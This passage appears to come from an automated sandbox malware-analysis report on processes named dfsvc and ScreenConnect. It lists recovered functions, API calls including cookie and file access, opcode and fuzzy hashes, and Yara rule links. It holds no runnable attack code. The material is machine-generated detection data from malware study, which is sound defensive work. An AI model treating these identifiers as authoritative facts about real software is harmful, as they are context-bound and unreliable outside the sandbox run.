                                                                                                                                                                                                                                          • Source File: 00000001.00000002.3020691152.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848e70000_dfsvc.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                          • String ID: 6
                                                                                                                                                                                                                                          • API String ID: 1029625771-498629140
                                                                                                                                                                                                                                          • Opcode ID: 925ce319db0b7b81f762d347104fcc3a4960f633d9bd07d92ef2cc6e32f6611f
                                                                                                                                                                                                                                          • Instruction ID: d6bb90f11d98c0807c45c1ea801441b7074b60779efe287f88b6687f8bda0e6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 925ce319db0b7b81f762d347104fcc3a4960f633d9bd07d92ef2cc6e32f6611f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC813631E0CA895FE75AEB7C88596B93BE1FF56350F0841BAC40DC7292DF3898068751
                                                                                                                                                                                                                                          Function 00007FF848E7E8D2 Relevance: 1.8, APIs: 1, Instructions: 279networkCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.3020691152.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848e70000_dfsvc.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CookieInternet
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 930238652-0
                                                                                                                                                                                                                                          • Opcode ID: 36f7afe2272c4fd35e017050e878d723cc294fba3cb5e5d20370a9283f8e1947
                                                                                                                                                                                                                                          • Instruction ID: 06fd2cf6aa6a94002bf36144ff27fa2d1d234e55cb95847b637c5a041deb68f9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36f7afe2272c4fd35e017050e878d723cc294fba3cb5e5d20370a9283f8e1947
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3891C03090CB8D4FDBA9EF2888557E57BE1FF59311F04426ED84DC7292CB7499458B81
                                                                                                                                                                                                                                          Function 00007FF848E7994B Relevance: 1.7, APIs: 1, Instructions: 184fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.3020691152.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848e70000_dfsvc.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: d788a4919c4f5fce496add3a16a15da089aa6feede1201630bf621172ffcd38d
                                                                                                                                                                                                                                          • Instruction ID: 35c552f6d853d0ec7868653aca38f01c8a02aa7a32d649a5d0e004df01e6a111
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d788a4919c4f5fce496add3a16a15da089aa6feede1201630bf621172ffcd38d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9951B03190CA5C8FDB59EF689845BA9BBE0FF59310F1442AFD04DD3252CB34A845CB85
                                                                                                                                                                                                                                          Function 00007FF848D5EEBF Relevance: .1, Instructions: 134COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.3020061344.00007FF848D5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D5D000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_7ff848d5d000_dfsvc.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 07f8db2c69a11467b77adb445338ebf573608763e6f4d788d372abed49356690
                                                                                                                                                                                                                                          • Instruction ID: 2084d61bad8d75e472d277d8b1e021548d405d51e140caafe4f23a6c0c0f0699
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07f8db2c69a11467b77adb445338ebf573608763e6f4d788d372abed49356690
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2241077180EBC44FD756DB289845A527FF0EF57360B1501DFD088CB1A7DB25A84AC7A2

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:12.8%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:11
                                                                                                                                                                                                                                          Total number of Limit Nodes:1
                                                                                                                                                                                                                                          execution_graph 11475 7ff848e6f66b 11476 7ff848e6f677 CreateFileW 11475->11476 11478 7ff848e6f7ac 11476->11478 11479 7ff848e68524 11481 7ff848e6852d 11479->11481 11480 7ff848e68592 11481->11480 11482 7ff848e68606 SetProcessMitigationPolicy 11481->11482 11483 7ff848e68662 11482->11483 11484 7ff848e63e22 11485 7ff848e7f3d0 CloseHandle 11484->11485 11487 7ff848e7f44b 11485->11487

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 00007FF848E6F66B Relevance: 1.7, APIs: 1, Instructions: 179fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 624 7ff848e6f66b-7ff848e6f700 629 7ff848e6f70a-7ff848e6f7aa CreateFileW 624->629 630 7ff848e6f702-7ff848e6f707 624->630 632 7ff848e6f7ac 629->632 633 7ff848e6f7b2-7ff848e6f7e5 629->633 630->629 632->633
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2539471361.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848e60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 823142352-0
                                                                                                                                                                                                                                          • Opcode ID: b06ae11ae1a15f68fd2a90170e29634ca7723c54a4a8f9c1e5aee6dcda97c30f
                                                                                                                                                                                                                                          • Instruction ID: 1d991755841529dcac9dd702b754e062c3cc76a000f921a0589a96814cbea75e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b06ae11ae1a15f68fd2a90170e29634ca7723c54a4a8f9c1e5aee6dcda97c30f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2551C07191CA5C9FDB58EF68D845BE8BBE0FB59310F1441AED44DD3252CB34A885CB81
                                                                                                                                                                                                                                          Function 00007FF848E68524 Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2539471361.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848e60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                          • Opcode ID: 4c9941f0218d8ddd3fbf1cd58481fec17e8d2780f4f8c661bf8afed2a756ee04
                                                                                                                                                                                                                                          • Instruction ID: 58cc362cfb86b7aa2e1f8a3367f2ae0425afa5826c71fc3363733872f189461e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9941f0218d8ddd3fbf1cd58481fec17e8d2780f4f8c661bf8afed2a756ee04
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38412531C0CB588FDB19AFA8984A5E9BBF0EF55320F04017EE049D3192DB78B846C795
                                                                                                                                                                                                                                          Function 00007FF848E63ED2 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 698 7ff848e63ed2-7ff848e685ff 700 7ff848e68606-7ff848e68660 SetProcessMitigationPolicy 698->700 701 7ff848e68668-7ff848e68697 700->701 702 7ff848e68662 700->702 702->701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2539471361.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848e60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1088084561-0
                                                                                                                                                                                                                                          • Opcode ID: 0db635518aa16ce71425f68c8a12df06c11263489ff1d1594b658d954a57e17e
                                                                                                                                                                                                                                          • Instruction ID: b70f8b36576f99319e9def39b82bc62c58b57c59c927387876f90755a1f08d6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0db635518aa16ce71425f68c8a12df06c11263489ff1d1594b658d954a57e17e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C521D57191CB188FDB18AF9D984A6F9BBE0EB59711F00412EE049D3251DB70B8468B96
                                                                                                                                                                                                                                          Function 00007FF848E63E22 Relevance: 1.3, APIs: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 778 7ff848e63e22-7ff848e7f449 CloseHandle 781 7ff848e7f44b 778->781 782 7ff848e7f451-7ff848e7f47f 778->782 781->782
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.2539471361.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_7ff848e60000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                                                                          • Opcode ID: 12338013be9bdc9580f6e2a1f20dfd09945eab6922d91a7ce94f9532ca653ca5
                                                                                                                                                                                                                                          • Instruction ID: f45ba6f32f042b17da2e13a67daabd2410abbf325a12009d6cb3f61b21692888
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12338013be9bdc9580f6e2a1f20dfd09945eab6922d91a7ce94f9532ca653ca5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D121CF71908A1C9FDB58EF58C409BF9BBE0FBA9321F00422ED04AD3651DB70A856CB90

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 01172013 Relevance: 2.9, Strings: 2, Instructions: 414COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: nCuq$
                                                                                                                                                                                                                                          • API String ID: 0-3867085953
                                                                                                                                                                                                                                          • Opcode ID: 90bed94a59033f0fff6d345472a5f1e28cd862ee69dfcfc0271a5c2c26d2cc06
                                                                                                                                                                                                                                          • Instruction ID: 48ce1979f033bf184f981075d4cb7f863fc644106f803d262faf16bf18c66bd8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 90bed94a59033f0fff6d345472a5f1e28cd862ee69dfcfc0271a5c2c26d2cc06
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE71E3307042018FC71E9F78D854A6EBBF6EF89210B248569D406DB3A9DF70CC46CB91
                                                                                                                                                                                                                                          Function 01171828 Relevance: 2.5, Strings: 2, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $]q$$]q
                                                                                                                                                                                                                                          • API String ID: 0-127220927
                                                                                                                                                                                                                                          • Opcode ID: 98d7182b5492ef00c21780a47110b1d0bebc7fa305f80026a67f5db1beb5eee3
                                                                                                                                                                                                                                          • Instruction ID: 5435df68af4635551296dde241ac58887f18e047a2da8dde3653bb3e5469c53e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 98d7182b5492ef00c21780a47110b1d0bebc7fa305f80026a67f5db1beb5eee3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E018F31A092449FC72E9F78D4185293FB6EF4621131544EAE816CB366DB359C51CB82
                                                                                                                                                                                                                                          Function 01175228 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq
                                                                                                                                                                                                                                          • API String ID: 0-600464949
                                                                                                                                                                                                                                          • Opcode ID: a3bee7ba1db48c8b86c60c0c31700f2f92f5e15a29adfce221ad39b7eca438dd
                                                                                                                                                                                                                                          • Instruction ID: e3eb17de06f5cc6b9e08b8fd82cfe39587246d8263c73b7aed68a3cbf7f28781
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3bee7ba1db48c8b86c60c0c31700f2f92f5e15a29adfce221ad39b7eca438dd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB710A34B106058FDB18DF69D8949AEBBB2FF8D314B1045A5E5069B375DB30EC02DB80
                                                                                                                                                                                                                                          Function 01176F41 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: LR]q
                                                                                                                                                                                                                                          • API String ID: 0-3081347316
                                                                                                                                                                                                                                          • Opcode ID: 548b576aa1f47f5e44f4c734ae6d713d3d9e95acf39fbd21acc4e6cccaad29f6
                                                                                                                                                                                                                                          • Instruction ID: 712701f92d61cac606a239465de323fdf3eb5e1d9cf36e67c6599f4861ce7031
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 548b576aa1f47f5e44f4c734ae6d713d3d9e95acf39fbd21acc4e6cccaad29f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65510030A002119FDB2A9F68D858B6EBBF2BF85714F108969E456DB3D5DB309C85CB81
                                                                                                                                                                                                                                          Function 011742F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (aq
                                                                                                                                                                                                                                          • API String ID: 0-600464949
                                                                                                                                                                                                                                          • Opcode ID: 723a2137f11c02a9b75561ef39a0ff3fad4acf31482b9b2803975a90650e19bd
                                                                                                                                                                                                                                          • Instruction ID: 62df4712da7320b9f3c996b17abc498ff3edc9e6c9643be46683c8a2f60150d0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 723a2137f11c02a9b75561ef39a0ff3fad4acf31482b9b2803975a90650e19bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D41B230A00116CBCB19EF68E59466EFBB6EF84310B14C165D91AAB349DB34E906CB91
                                                                                                                                                                                                                                          Function 01173480 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: ['
                                                                                                                                                                                                                                          • API String ID: 0-410297704
                                                                                                                                                                                                                                          • Opcode ID: 1c9eedc19976ce51ffccd1d9de392e31c8422b89d2e5a10f61deae3ed75dd036
                                                                                                                                                                                                                                          • Instruction ID: efc0e92610e4f7713ecff5faa6def8786ece6142e8c3b1516f13445ac734d5da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c9eedc19976ce51ffccd1d9de392e31c8422b89d2e5a10f61deae3ed75dd036
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD31D3317107515BC709AB7CA85095EBBEAFFC42A07008578D829DB348EF70DD058BD5
                                                                                                                                                                                                                                          Function 01177623 Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: fb87c36a72676c2b18440ec2c664aa16f84868a599e1d549228d40a11918a561
                                                                                                                                                                                                                                          • Instruction ID: 34a56af5672d5482542a515eca24af66a14b6dee6d74efc70c1d0c3f0f63ef8d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb87c36a72676c2b18440ec2c664aa16f84868a599e1d549228d40a11918a561
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69812331D093958FC706DF78D864AC9BFB1FF86300F15859AD040EB2A6E7789989CB61
                                                                                                                                                                                                                                          Function 01174940 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 377e89bed5ce83371d886676afe4d147ffab4dffc89ea2f54f491e327a4ec863
                                                                                                                                                                                                                                          • Instruction ID: d71b4c696efc348af7eee37eb76e85ac7c40089552e5b28ee602099c079061cd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 377e89bed5ce83371d886676afe4d147ffab4dffc89ea2f54f491e327a4ec863
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CE51FA34600601CFC728DF29D894956BBF2FF8D324B144A6CD4979BBA4DB31E846CB44
                                                                                                                                                                                                                                          Function 01177770 Relevance: .1, Instructions: 133COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 4502e09abe88a56fe6dbd21c66176efdda4147584205242597cb4b1a6a66138b
                                                                                                                                                                                                                                          • Instruction ID: 95e618bb26bfc4483eec236a1c88dc05a3f2dd3587a33e5ff8308b436a3063f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4502e09abe88a56fe6dbd21c66176efdda4147584205242597cb4b1a6a66138b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B516D34E003099FDB15EFB8D854BDDBBB5FF89300F108569E514AB298EB74A985CB90
                                                                                                                                                                                                                                          Function 01173668 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: b7c873ffc790b743e3b63755280c03a24a3625c7b6d428ae8490e6b5872277eb
                                                                                                                                                                                                                                          • Instruction ID: 2cde70eb85a4570bf6522f3dff7f8022b792f644767b774e3551fcd086ecafbc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7c873ffc790b743e3b63755280c03a24a3625c7b6d428ae8490e6b5872277eb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B5163746007058FCB28DF39D944A5AFBF5FF84310B144A68D466DB7A5EB30E98ACB90
                                                                                                                                                                                                                                          Function 01173678 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: a546bb7b049f851e36067a8b45235fc708ea696afd12cdd4e3311798a5d91a59
                                                                                                                                                                                                                                          • Instruction ID: 750260a7ea12370230e353afe00e72e00d533e100e694f56838db9f91fa885f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a546bb7b049f851e36067a8b45235fc708ea696afd12cdd4e3311798a5d91a59
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B414D74610B05CFCB38DF29D544A5ABBF5FF48310B104A28E466DB7A5EB30E985CB90
                                                                                                                                                                                                                                          Function 01173DC0 Relevance: .1, Instructions: 108COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 68cd486adc23693a689480b0e39eac1fec386e2d2dd277f713619c3542e8cfa1
                                                                                                                                                                                                                                          • Instruction ID: 0043046bbe66b3d68e93328ba106bef02931642fa7edbcca89558db2980ab2ce
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 68cd486adc23693a689480b0e39eac1fec386e2d2dd277f713619c3542e8cfa1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC318F30B202168BDB18DE69C455AAFFBF5EF89354F00886AE416E7354DF31DC059B91
                                                                                                                                                                                                                                          Function 01173828 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c851ccdef388eb380dcef8fad4bbd5c49c489943bea1592b1914b6cdc9eca544
                                                                                                                                                                                                                                          • Instruction ID: f4754f03975f5f84118cd3dc8c9a9e3872e76f13668a42fdc75ed051a92e127b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c851ccdef388eb380dcef8fad4bbd5c49c489943bea1592b1914b6cdc9eca544
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9031A170B146558FCB09DB6CC8505AEFFB2EFC6310B1481AAD949DB395DB309D06C791
                                                                                                                                                                                                                                          Function 01175548 Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.2523546241.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_1170000_ScreenConnect.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3f7d2ea999be138ec0bdbb182d9364163ad7961fe3b9b4e5c8a72ac1f0f36b8a
